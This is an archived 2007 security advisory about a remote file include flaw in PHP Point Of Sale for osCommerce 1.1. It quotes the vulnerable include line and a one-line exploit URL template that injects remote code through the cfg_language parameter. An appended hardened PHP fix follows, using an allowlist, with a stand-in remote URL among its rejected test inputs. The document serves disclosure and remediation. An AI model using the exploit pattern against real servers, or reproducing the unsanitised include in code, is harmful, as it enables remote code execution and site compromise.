Computer Security
[EN] securityvulns.ru

From: BorN To K!LL <q.t.i_(at)_hotmail.com>
Date: 17.03.2007
Subject: PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln

Script: PHP Point Of Sale for osCommerce

Version: 1.1

URL:
http://puzzle.dl.sourceforge.net/sourceforge/phppointofsale/PHP_Point_Of_Sale_osCommerce_1.1.zip


Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:
index.php ..... and so on ...

code:
include ("language/$cfg_language");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~
wWw.SiTe.cOm/[path]/index.php?cfg_language=shitcode?

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:

Dr.2 - str0ke - AsbMay ....

KuW SeC ..... AsbMay's Group

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
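
A hardened replacement for the `include ("language/$cfg_language");` line quoted in the advisory, as an added example that is not part of the original post or the project's code: the requested name is matched against a fixed list before any path is built. The function name `resolve_language_file`, the file names and the sample request values are assumptions constructed for illustration.

```php
<?php
// Added example, not the project's code. resolve_language_file(), the file
// names and the sample request values below are constructed for illustration.

/** Return the absolute path of an allowed language file, or null to reject. */
function resolve_language_file(string $baseDir, $requested, array $allowed): ?string
{
    // Arrays (?cfg_language[]=x) and other non-string input are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact match against a fixed list, so nothing but a known file name
    // is ever joined onto the directory path.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    // realpath() is false for a missing file; the prefix check catches a
    // listed name that resolves outside the directory (for example a symlink).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed language directory so the example runs stand-alone.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/english.php", '<?php $lang_loaded = "english";');
file_put_contents("$dir/spanish.php", '<?php $lang_loaded = "spanish";');
$allowed = ['english.php', 'spanish.php'];

// Constructed request values: one valid name, then values that must be rejected.
$samples = ['spanish.php', 'shitcode?', 'http://example.invalid/x.txt?', ['english.php'], 'german.php'];
foreach ($samples as $value) {
    $file = resolve_language_file($dir, $value, $allowed);
    printf("%-36s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : 'include ' . basename($file));
}

// In the application: fall back to a fixed default instead of including raw input.
$file = resolve_language_file($dir, $_GET['cfg_language'] ?? 'english.php', $allowed)
    ?? "$dir/english.php";
include $file;
echo "loaded: $lang_loaded\n";
```

Initialising `$cfg_language` from the application's own configuration before the `include`, rather than taking it from the request, removes the request-controlled path entirely; the allowlist is for the case where the language really is user-selectable.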
